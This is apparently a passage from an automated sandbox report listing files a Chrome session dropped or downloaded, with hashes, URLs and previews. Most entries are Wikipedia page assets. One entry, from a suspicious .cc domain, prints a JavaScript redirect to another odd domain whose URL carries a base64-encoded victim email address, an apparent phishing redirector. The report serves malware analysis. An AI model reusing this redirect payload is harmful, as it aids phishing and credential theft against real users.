                                        Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=5, description=stone.tif, xresolution=84, yresolution=92, resolutionunit=2], baseline, precision 8, 220x261, components 3
                                        Category:dropped
                                        Size (bytes):23640
                                        Entropy (8bit):7.9434770539471495
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:D0475CD56482113451A881B76D515E72
                                        SHA1:23E161F0051C28D95DA6F89913495EF4E3936F16
                                        SHA-256:42F0260554982F1A8CBA1ED19F49D6F4D5FAD570FCECD2B3B76518D47D0CB317
                                        SHA-512:F9FECDB8D9BCADF4690F350F9D7CD0051F1B70E06CE334FA7E3CBC605E06339B7868F5D6687C49E36281CC965BF64CF1D633D461D4971325E97F39590E1A168A
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:.....lExif..MM.*.................J...........T...........\.(..........................stone.tif....H.......H.......C....................................................................C............................................................................"........................................A.........................!.1."AQ..2a#q.$B....34Rbr..S...%.Cc................................#......................1Q..2!Aa"B.............?...S4.S Y..N.w.\.....s..75"bF1.....7(.9.v...A.Q7.V..Qz.G.G.t.c..{.\.O+.0iec..O....Y..F...(.c........{...I]w..tq.+.!;U.. ...2..#Nu....l..8.k....::.w...m......*.e.....68.{.N..;....3.4.z.-.K..<.HE.._7<...?.7...z..R.4.8.B.I#...d.'...'..m.M:.t.v..M2.B.......pp....Y.....p..N.......UGV)j$..X.T.3.3.B.V2.<e.x...k..m4uV.eM5M=......US.?Q..$).N....\d.'V[......IA%}m..(.H$.I.$r..*1..,.0q..}>...5 ...N..'!7..}..~....*......OI.K.I-...-...g..g..,@d..qOs.k.....`.R...........J..RL.....?...C....w.[.:[..eTfX..B.![..;[.pppN.......h.Gv..o.jW..,Z.fU.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 34 x 41, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):2029
                                        Entropy (8bit):7.821643285180128
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:319E1F80581E636B8715D4580419CE90
                                        SHA1:C39292DC96254875A1438DFBB719E26C3D7CD822
                                        SHA-256:C303D944A89C49D691896E88044E7C209EB1DF09D49F85E478107DA8A4EB2565
                                        SHA-512:EC5994649F37C28DBF2EF6B0DE7132314D287B09B912BB0B6696E11CA9F227BE63EE20EC60C467AD9A64EFBADCF7EFACE6F3C76AA55CB2830F0A2531B3E932F2
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:.PNG........IHDR..."...).....P.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............tIME......9.......IDATX...l....?.>...:J)[]..l..hK5.J[%..g..f........as..o..d)/......f......Tpia.....iu+s.Y..?..}.....<.}u.G.${...{..|.s.9..+L...v.P.l.....k.%?h.L&..T7.@...e..f...|5. .>..u..;`.....r..wv:....u7...>`."/.r..e...........">..Y....I.R..V...A.s,..G....*#.ZS/..x.../..T5......|Q..+.:*}...6D...O.:NbR|D+..d...f.OTl.?/P2.?M.K...Y..~.K...t}...."......:....,..... .W..1F><...Bn.k......F.V.<.N0s......D}....Z......?....B...u........].29...g.H0..l..|0....U...8..}....a.P.........q..../_........%.........-<...(3P.,n....}...o.%..;n.}.vkm,=.|.;.._.../...<..E..l...h<.4.h...3.!...-.m.!...E.U@.@.#...8..Y..x8;...y.....0....P....(..D.+...j:..<3.C.KO......O.~...[0PD<..$....).;..+)...tu...A2UD2..VK&!.\BR?K.R.........Ykm......=...#.X.+6.....R..+$.[I. ....@. ..Tz&). ....x. .#a..2..*..(.../Y.,..z@.{?i.WF.E2.R)H.A.W...|q..9..-.[...sv^.....*.V..
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JPEG image data, baseline, precision 8, 220x220, components 3
                                        Category:dropped
                                        Size (bytes):22430
                                        Entropy (8bit):7.966285509429136
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:5C7FFF145B91A7329DFC728E855BDDF1
                                        SHA1:7B25BD36AA073F6252FCD7D73BA6E859047C7642
                                        SHA-256:EDA8EF90F683A92EFD74218055D1F32FA63CA099B3B98916E6D3DC6308A4FE49
                                        SHA-512:62637AAE2B6F379FBCF490B1EC97B57AC4C08CC91D83D2264DDE3307BD416FF21796A8DD011EB19075EF40E41F084FCBE170A26038D72B564D12811D10CA5F90
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:.....C....................................................................C............................................................................".........................................>.........................!1..A"Qa.q.#2..B...$R3.....Cbr..%c..................................5........................!1.A.Qa."q....2...#B.....$.............?.6.6.t.....@......q...pJ...F.\^......'O.d.-].......8...R.....R.).oxdc....2.8J..g.........d.g..oK/#b7..1..z.+.z.....(.z9.......yg..+.*.I...e.6s..s**.2....z.G..+...fOP..H6 .aY.Y.X.f=;5..ZI&...;H.....[..X.....\......J..6._A..X....Dp.wUujFUd~/.0<.....*6&..i.....jP..@[.|l1.,.....)...KI.Q....Y. ..-...mk.[..X..V..Gd........^..B....WQ...%S:....X[...........]3.."F.H..0(V..k.6.....T.F&.......Un9#_...7..No.OJ...j.6:d...%,V..L.......p...uU.......PG...r.*....=M....(.e.]w.qd.[..0{...GG..K....SZ............qqpm.s....7..l.|......wT.*..(X.Ut.A._.`...<.0.k.z.iZ..X.<.,h..X...............Kcz..Y.L..L..j.%.x..2.r..{.v$.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 220 x 211, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):31676
                                        Entropy (8bit):7.984546478032234
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:A2BF1F86313A5167374E27A2F393BFC8
                                        SHA1:6588A1E5ECE62A80603BA91458420ABCEA629396
                                        SHA-256:4A2A830C42621E8ADE6AEDDAAE7BB2C13A5B3E0774B419B7B314C82EB2113060
                                        SHA-512:5F62F0C9586E3BD13689574DD0CF6609CF0F91B66D3EFD4CBD2BCFE7514802DF57BC5411E40F33BE5726F3250FE0CA2ED8F59B26E5912CAA6B93C4F0CF29B936
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:.PNG........IHDR...............}T....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............tIME.....13$|_B..z.IDATx..w.......;N..(.@.H..I`0.1..k..:....k{.^.m..u..g.. .Fa..!.B..<9w....G.h.43..#..<.H.]]U}...{.{.cP6l.P....#./.Y.r.p.y..+.-.Z(..W..n6..u..U.V..RJe.-s....Bs.... .@X.P.3.c3L-.%U...%.P2.5.J..'>-.m...K.}....q9...xS.;.|"PR.*.p....yw.q.3X.."..E....\5|.H..H'...J8..vi.$R.$.!.]....>V..j....7]...x.B...<y...=q.%KR.Sj\.&.X.....2.......s....]..x.,.Gt]|.-.Rh....=.j...x.`]X..nJ..p.^..#2.L.0..q......w.9.J....\36.g[..K......5L),.0.#*..1..i.6Z.]......w..-x3..)5....b....B.U.EK.....O./G..@..<..:... ..;.I.*....4....6o{.s..}..,x\.5|.e._...i\....|....i\.<...^....FEI~Z.......[C._I.AR._w@Z...X.z..T..1.....2.L..P..z...-.@.P....j.'U......t2y...........O.q....R*[.?......h{..h.vh.(.J..:..j..(....=..~..!X..Ty........9.m...z.C...v/.r.....e ].;Q9*.K.E..G5...Z.E.&.O.q.s....%.h.]...I..z..w.y..P......-z..!...|.C..&.\W...w.U...5......c.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:SVG Scalable Vector Graphics image
                                        Category:downloaded
                                        Size (bytes):268
                                        Entropy (8bit):4.814615653975803
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:20E2BF3F38E766E007DFD18D33E9FB41
                                        SHA1:BC1D4BC3D10C2BFCCADBF7109F760550CE5FA1A6
                                        SHA-256:65829329CB8D2D9C79A1C427ABB906E0841FCB1A833840598150559F87CC1902
                                        SHA-512:EE2051285A05849F4BAAFBD4CBBDDE802DAA281C20D96CBF2D8C4E5B80D7C2A9123BB0D0DDCAB097DC45779C784537B998E6080DB4FEDDE34C23CDA34605352F
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://en.wikipedia.org/w/load.php?modules=skins.vector.icons&image=ellipsis&format=original&lang=en&skin=vector-2022&version=1qdch
                                        Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 20 20"><title>...ellipsis..</title><g fill="#000"><circle cx="10" cy="10" r="2"/><circle cx="3" cy="10" r="2"/><circle cx="17" cy="10" r="2"/></g></svg>.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (23093)
                                        Category:downloaded
                                        Size (bytes):690362
                                        Entropy (8bit):5.349961468796295
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:8800B2679F43242D28C71107D22BFE18
                                        SHA1:B69655B0C89575634A54585BCDA56A1B01DCFC9E
                                        SHA-256:D860854E4C7FEAC418D7FB7A7CCB8BCD4FCEA11ED73084D59BEF05AF0B99C36C
                                        SHA-512:4394D4A457B471BA688B42BAA75D5DC5403B633452684519055560EB4983E651BE73A92188C6D0B407A21296AEE143DF26AE22843AA15DF7A4E197CE93AD30BB
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://en.wikipedia.org/wiki/Human_rights
                                        Preview:<!DOCTYPE html>.<html class="client-nojs vector-feature-language-in-header-enabled vector-feature-language-in-main-page-header-disabled vector-feature-sticky-header-disabled vector-feature-page-tools-pinned-disabled vector-feature-toc-pinned-clientpref-1 vector-feature-main-menu-pinned-disabled vector-feature-limited-width-clientpref-1 vector-feature-limited-width-content-enabled vector-feature-custom-font-size-clientpref-1 vector-feature-appearance-pinned-clientpref-1 vector-feature-night-mode-enabled skin-theme-clientpref-day vector-toc-available" lang="en" dir="ltr">.<head>.<meta charset="UTF-8">.<title>Human rights - Wikipedia</title>.<script>(function(){var className="client-js vector-feature-language-in-header-enabled vector-feature-language-in-main-page-header-disabled vector-feature-sticky-header-disabled vector-feature-page-tools-pinned-disabled vector-feature-toc-pinned-clientpref-1 vector-feature-main-menu-pinned-disabled vector-feature-limited-width-clientpref-1 vector-feat
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 220 x 147, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):17649
                                        Entropy (8bit):7.973570005847492
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:33DA157006D88D6E63E88342DD33AB02
                                        SHA1:6270823D613579A0A6DC7BDFBFF3A5B68A719693
                                        SHA-256:B22ECD4C8279D462903C433B023E683DB2870F46F72E9B57867355226886AABE
                                        SHA-512:CD61F0C70C34CDA453B66F342745C05D4B72DEE10C6309853887DBC242E4AA18B63FB842076F238B7B4EB461FFC9B1CCDAAF76781CE502A88B77DEF2008D8737
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:.PNG........IHDR..............Tw8....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............tIME.....'...O...C.IDATx..wx.u.._..e.{..Bh.7.*..........+z.YNO.vzw.S.^PP.)..;......Bz.$...~.lX...E.$..yx.2..3..y..>..Gf..". ..D.%.". .."H. .."H. ..... ..... ...". ..". ...F.=.A.q...~.A...D.\.l&L...od........SSM....B.\....q.v7*pu.H*....;.L.M4sX/...:."......#'......f.,..`.......IB.......)u..Lv..9......J...#...:..kr.^...!1V..,.M4..YAg.i."....V."T........"...LL218..D..."+$n...scn...../H.>.A..."_.*D....:.....,..f..Tv...R..f1.U..>...y. ..w..../QcgS...Y..P...wZ....R...35..cZ....b..D[.?XP.<...u0+...0...F...M.k.#.S;p......c..{.Z../.i6I..a..i:.....s.4*Y[.&Z.@#saq....D.(j....yy{.W.E(..8....j...4.?Z.p.. ..L=Wew."w..\C..w..V.XQ.!B.D$.q.=.j..%JG...>....3Ro.H.f..y...-..n......l.:..N......b...-......?..i.2....!\.dd......P..V1n..U....J.....mr...Z|y....C...g.FK.zyP.+........8D..R..D.%r...&fh..A.N[..9U.....&....5.Z.|.'..u.n........)vB.+..p:..K%R....1.Kb.5.....
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:HTML document, ASCII text
                                        Category:downloaded
                                        Size (bytes):144
                                        Entropy (8bit):5.370684203609197
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:E5D9F48A6A5D83EE54E96FE0DABAF34F
                                        SHA1:F185D81F424765CDB1E4692D4A67CA3AE3805AD5
                                        SHA-256:0E922119BB5F6C1AE63F9FAA5B8DB9A92C8DD1C4D90193BE809BAA8F4DF36B41
                                        SHA-512:916015A7BF572B0EDD06B41E5691F484FB711D9F31B2300DBE3B1BB03DDE3233A30EF7DE59D0707349592774178795056B6A36BCF37A3776B5DC53EE5FDE7267
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://40lzzyxj.banquetesaraucania.cc/whhQZbETHw40lZzYxJsM7jnv7BUMJtwhhQZbETHw40lZzYxJsM7jnv7BUMJtwhhQZbETHw40lZzYxJsM7jnv7BUMJt/ZC5kcm9ib3RAZ21zLXdvcmxkd2lkZS5jb20=
                                        Preview:<script type="text/javascript">window.location.href = "https://FVI5NP.tgardtorveni.com/r6rSI5Yt/#ZC5kcm9ib3RAZ21zLXdvcmxkd2lkZS5jb20="</script>.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 220x173, Suserng: [none]x[none], YUV color, decoders should clamp
                                        Category:downloaded
                                        Size (bytes):8362
                                        Entropy (8bit):7.978531588045998
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:92F9CE433E1F1E3F0EBBC95F63F6CD15
                                        SHA1:852C3FF28CE2F6930707A7806445832AE315081E
                                        SHA-256:04BB9067E54F19FA68D24DD71ACD9E30361F59B814CB5C188FDB394D265395EC
                                        SHA-512:C8E8DB3A6FE6E53EE7EBBA965AB044B3F02AF376E135A52002F0FC73DA028799B59E89319E56CEC4BF10E6634B9C41CF16E13F1F291600BC71B3B7711A5B0C20
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://upload.wikimedia.org/wikipedia/commons/thumb/2/24/Eleanor_Roosevelt_UDHR.jpg/220px-Eleanor_Roosevelt_UDHR.jpg
                                        Preview:RIFF. ..WEBPVP8 . ..pt...*....>E..D"....].(.D....7..L..0+.\..C.....7....0.i../.........;....~.p.[.@_v.......................{.~....W..._...?3=..7.../.'....?......w...O._...?i?.......Ch..%cb.'`2....2.-q..w[.P.7k...c..%..bs..'.P.oj...I.f.l.[........Q....qh[.VM. ..~.=.6c2}..u.=.*...Z.L6|..})7..R.....U....F..#........t.i....Y..fB..0......H....FW.e.Ub....4J.h...F.lDN..|bfd.~E.h^Pd..F.e.1Ln.a..'....x.u.......*.7.p.?.(Q.x...Q....:6}......!qhz........#..[\g.%...5.)-RK...* .....zp..<o.op.to..n..i.FJ....N..;...$.{..N.%.".......KRw.b"......I.U...e.U.*l.=...;..B ..aEm.......)..j..# ?.(!..O..%G..T.~,...p..!..Yj...L.-.....i...M.vI..4..e..=h'.Q..qa.H.z.s.>$.5t..i.4?.4.g5\..![. .u.@T]..x<...).n..XL........./.B..........r.a.<..zs. ....0"..j2./=..R\.....~.s..b.wb.C.ZG..LD.PS..|.h..!p}...n...d......./Kv...w.4=.,....h2..G.*.^...RK:..+........?k.....F>.XO.S.2....`.<....N..@.4...Z..L..4d.[.J.A.C.dl.-..f[.B|.{-.....N..Ao....c..>@... .5.>x.U....S.k..G.I..Ik%...|i....N..
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:SVG Scalable Vector Graphics image
                                        Category:downloaded
                                        Size (bytes):432
                                        Entropy (8bit):5.093179669524472
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:F99D5D66E6EF5FB312ED07842356CA2C
                                        SHA1:B798BA31F2E6BA97A7C5171E7FF35F13CBDD3516
                                        SHA-256:494500174898F04B1F826584221B2A88220BF1EE130221FE6B1AD892DBD84B8D
                                        SHA-512:BDF07C67997F01B67258EADC8756969DB1D72B123EE798FDD5A96252F869A21621DFE84204ED4DF635A198720F7CF3C29E40C82C178D500A102A1A6E9544A05C
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://upload.wikimedia.org/wikipedia/commons/6/65/Lock-green.svg
                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>..<svg viewBox="0 0 595 945" xmlns="http://www.w3.org/2000/svg" version="1.1">.. <path id="shackle" d="m507.5 507.5v-260a210 210 0 0 0 -412.84 -54.352" stroke="#008900" stroke-width="75" fill="none"/>.. <g id="body">.. <circle stroke-width="75" stroke="#008900" cy="647.5" cx="297.5" r="260" fill="none"/>.. <circle cy="647.5" cx="297.5" r="90" fill="#008900"/>.. </g>..</svg>
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:SVG Scalable Vector Graphics image
                                        Category:dropped
                                        Size (bytes):305
                                        Entropy (8bit):5.2653965840895625
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:8330E30926B49BB6BE90279642C32293
                                        SHA1:0D2BA85E0B77E2439993E631C96703DF3355BE7E
                                        SHA-256:78F5EF3E585B3073C58B955ACE7C662E51EE29BB2FF4EF4B0769BC46E8D7110C
                                        SHA-512:C1A84B712FBC2CC3156E632E9EB044E8FA45F8D067F250A84B42C15B2A376DD2C952B8BBCC436991E0A60AB360E29F8E62244582AC7721DB7BAB6D88086B9B43
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg xmlns="http://www.w3.org/2000/svg" width="15" height="11" viewBox="0 0 11 15">..<g id="magnify-clip" fill="#fff" stroke="#000">...<path id="bigbox" d="M1.509 1.865h10.99v7.919H1.509z"/>...<path id="smallbox" d="M-1.499 6.868h5.943v4.904h-5.943z"/>..</g>.</svg>.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:SVG Scalable Vector Graphics image
                                        Category:dropped
                                        Size (bytes):2134
                                        Entropy (8bit):5.040373500529747
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:475691B24FC0B3A3031ABF3E09EC4CDF
                                        SHA1:D407CABEE4DEDCAA48E3A586A4F441D322E9C20F
                                        SHA-256:173FAF34D7D2CF53A5C015AF700EDEF3BAF779A910ACBDCBB0B22C61B211E7AB
                                        SHA-512:47C3C95E683EB681887DAFFCFB2EF673F4CB3072AF06F797B7B11A68EB819E291DC88C9BB059C2DF3AFA26F65DB3D71BE642AD206EB0799C85992BFA97E1DBDB
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.<svg. xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:cc="http://creativecommons.org/ns#". xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#". xmlns:svg="http://www.w3.org/2000/svg". xmlns="http://www.w3.org/2000/svg". xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd". xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape". viewBox="0 0 597 946.99994". version="1.1". id="svg2". inkscape:version="0.91 r13725". sodipodi:docname="new.svg". width="597". height="946.99994">. <metadata. id="metadata13">. <rdf:RDF>. <cc:Work. rdf:about="">. <dc:format>image/svg+xml</dc:format>. <dc:type. rdf:resource="http://purl.org/dc/dcmitype/StillImage" />. <dc:title></dc:title>. </cc:Work>. </rdf:RDF>. </metadata>. <defs. id="defs11" />. <sodipodi:namedview. pagecolor="#ffffff". bordercolor="#666666". borderopacit
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 220x147, Suserng: [none]x[none], YUV color, decoders should clamp
                                        Category:downloaded
                                        Size (bytes):15616
                                        Entropy (8bit):7.9866604928536455
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:6D9993EA8B571F380B2B56424F088C88
                                        SHA1:282549846F700C4F1FB0543305F427D20323A790
                                        SHA-256:4F779593D606446C7C3E30AEFA38166CD3878BB5F1C6F4DCF01BD28CF4B84A9F
                                        SHA-512:38963246EEC01F20923B31EC6F39D611A2849F7326C7DE3F3516CB4CBCE3F4450F5A9E1406A466B68057C0424F1279C33A8DF8D49EEA7C4FCE44162B48C0FC25
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://upload.wikimedia.org/wikipedia/commons/thumb/c/c1/Unpicture.jpg/220px-Unpicture.jpg
                                        Preview:RIFF.<..WEBPVP8 .<.......*....>A..C"......(.....P.n.g.0r...0. NZ.a.+..;.9j........s....?...?/.o..._.:*...q.....+.......bo..o....7.>'=;......._..-.G.....~.~g.W.....?.?....G.'..k. ...2...........]..........}q..._......~.....C.o.....?..=.9...[..........%...?.....|..)...........O...................I......._......z./._.g...?x_........7.r....z...&.\.:....B:H....Y$(z.w...,..kUg.?J.....euu]|J...O.*.k......`..e.iZ.*.eCNl..E...../4.e...........&q..e.d..Y.u...9.jv..WV..j...W.....-.qa....K2z....>.m.C2..9..^.{b..B...#..C...S0..%..'..{N.i.....Fl.......;}...(.&.b._...@.eu*^..g|H./s...>.>y......?.m..0.......d...6...>Z...r.8...a.4..v...bO.`;......@_.e.P?.K.,.U.n....Z...7s!....a...e..{.A.>.....+..H....g...A.t.|k........3....).w. ..o..h.....9.)..q.u.. ..W.z.%..."W..r.Ca(S...3.7Y..G.-....+.0+.7.6....t@.....TQ@U....Z.E0^".Op..1....%...=.}.z....f..Sr2v......p.+..A.Z.Vi._..y3...4.F...6.i..7..4...W.%.J.#....%6.....).D.i....i...k.E........x..un.LU....Y[
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:RIFF (little-endian) data, Web/P image
                                        Category:downloaded
                                        Size (bytes):252
                                        Entropy (8bit):6.935289076283123
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:7B37B498137AB97F2034157FEA2053E3
                                        SHA1:3AA74B28D971C6697F7D7293210EC2530867B4CA
                                        SHA-256:05EC2416B8D4D03CD513D2CB45D66EE448F3AC6C8CB48E4512BFE622E12C63F9
                                        SHA-512:6D177D50DA0EEB9C127644CB6DA917CF5DDBF115380ABA33A689454E06EC383130A7ABF13F48CA48A6427E92FD1F4E391A504668770ACDAFF64794FDC7CA3815
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://upload.wikimedia.org/wikipedia/commons/thumb/1/17/Balance%2C_by_David.svg/21px-Balance%2C_by_David.svg.png
                                        Preview:RIFF....WEBPVP8L..../......m.H.O.^.Y..j.5.......U...8.TZ.tl@...,@.L..y'.3./..h..A....F...A.@0#.~{O.i?@jN.YK@..*q..."....`..R..,.*](...JR..^`JD..B.......@..E....W.T..Pa.X..4<..OU.B.j>......_wz.".0..C...A.|.P.......n....H..y.'JWT....~....N......
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 56 x 51, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):61
                                        Entropy (8bit):4.068159130770306
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:CECF15281EEB2422804CEC25DED2B3B6
                                        SHA1:32C9A127269C808B4B2A413DDA3552F670DF1EEB
                                        SHA-256:07AFEFF384B151D287B996F95B3A39D0657122F96BB61CC299AA2BDDDCC6A52C
                                        SHA-512:B997E62033B1B5945E2E796BBD920309370D207F9E3BFC5F5089C3150E5E586570D99C8DEEF707E4ED17F44445CF35A24C322E9244B271BF82DF401C2693A8A1
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:.PNG........IHDR...8...3.....M#\.....IDAT.....$.....IEND.B`.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (4150)
                                        Category:downloaded
                                        Size (bytes):59032
                                        Entropy (8bit):5.199069333532633
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:F57A0D64874A6A04F6AA7CF06835886E
                                        SHA1:E6FCA984513621E526EA56A3B7350D70F57DAE24
                                        SHA-256:D0062C29C349E24E686CF0CB2EC11D151BD699D3257689224C81AB7237ED1BCA
                                        SHA-512:422DD0433C4F6D11B42DBB751AD962F8BA30E94599EAA005BD384E22AA11FC6779F4488D84AADCFE406661DD5197B7C3571378FC7A9D9650E8A6F2EE2802AFFB
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://en.wikipedia.org/w/load.php?lang=en&modules=ext.visualEditor.core.utils.parsing%7Cext.visualEditor.desktopArticleTarget.init%7Cext.visualEditor.progressBarWidget%2CsupportCheck%2CtargetLoader%2CtempWikitextEditorWidget%2Ctrack%2Cve&skin=vector-2022&version=1v4rw
                                        Preview:mw.loader.impl(function(){return["ext.visualEditor.core.utils.parsing@1rcro",function($,jQuery,require,module){ve.isBlockElement=function(element){const elementName=typeof element==='string'?element:element.nodeName;return ve.elementTypes.block.indexOf(elementName.toLowerCase())!==-1;};ve.isVoidElement=function(element){const elementName=typeof element==='string'?element:element.nodeName;return ve.elementTypes.void.indexOf(elementName.toLowerCase())!==-1;};ve.elementTypes={block:['div','p','table','tbody','thead','tfoot','caption','th','tr','td','ul','ol','li','dl','dt','dd','h1','h2','h3','h4','h5','h6','hgroup','article','aside','body','nav','section','footer','header','figure','figcaption','fieldset','details','blockquote','hr','button','canvas','center','col','colgroup','embed','map','object','pre','progress','video'],void:['area','base','br','col','embed','hr','img','input','link','meta','param','source','track','wbr']};ve.matchTag=function(html,tag){return html.match(new RegExp('
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:RIFF (little-endian) data, Web/P image
                                        Category:downloaded
                                        Size (bytes):342
                                        Entropy (8bit):7.337032796977724
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:909300838D8BFDEFCC20F451BE2CB930
                                        SHA1:B5E7DD82A9BB9D80B1245C5BFF601FA22001449C
                                        SHA-256:E9772E285C002A9BBB8AED96FAA4008678F2B117670940B06572472D2DC730CC
                                        SHA-512:276F15BC09F20FC28B5C672D5EC5A483453EF2295D2354FFEC8126614261932D15EACD61A11511E6AC624469BF1D643D0CDF0DA1016CCAB81719E8C0923CA2AD
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://upload.wikimedia.org/wikipedia/en/thumb/1/1b/Semi-protection-shackle.svg/20px-Semi-protection-shackle.svg.png
                                        Preview:RIFFN...WEBPVP8LA.../....7.$G....9...`.6.".}..2........^.q.F......[..@Y.a.....F...>..."..uY)a]V.e..~......2/......J\D%f.......~..(f(^..(..:.*.....B.Rb.S..%.P...g.F0~...v..1..I.K..c-ZRb.*....6Y..|..]...Si.B........&.W...........p...n.k....j...z....@[.L....*c.P.+.Y.}....e..l...t......p^-.qL-.qR...D..G|..r).%.B.e..+.........
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:RIFF (little-endian) data, Web/P image
                                        Category:downloaded
                                        Size (bytes):828
                                        Entropy (8bit):5.441490483771013
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:40FA101C3309629618EA92793FEEC630
                                        SHA1:01F7DED4358E720A588D057BEB13C8775B6F7425
                                        SHA-256:8C19E53C960E217BE652C77699D058BC0DC671842C0B2F2B51FF93C4E569F0F4
                                        SHA-512:92F0BADAD99CF71D9A371D7DAD015343328D7BEAD22F819A5F5861B1EB7BF487B86DDBFED24E1D2AA580A6F5ABAEFF00EB182263CA9FFFF3EF228C44AA5F8F0F
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://upload.wikimedia.org/wikipedia/commons/thumb/9/97/The_Earth_seen_from_Apollo_17.jpg/16px-The_Earth_seen_from_Apollo_17.jpg
                                        Preview:RIFF4...WEBPVP8X.... .........ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..VP8 .........*.......%..t.k&..@..Nk../.?.{....m....T.).j........@..x.\..K".i........e1.q...."....\K[w..|.~.~$I.2......f..O.O.e.y.lH..1..)...C{0..~.........o.Lo..m..O.......c).z........Z.2....Dr........2..0...........@.".nYJ...........r.._......S.........
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 19 x 19, 4-bit colormap, non-interlaced
                                        Category:dropped
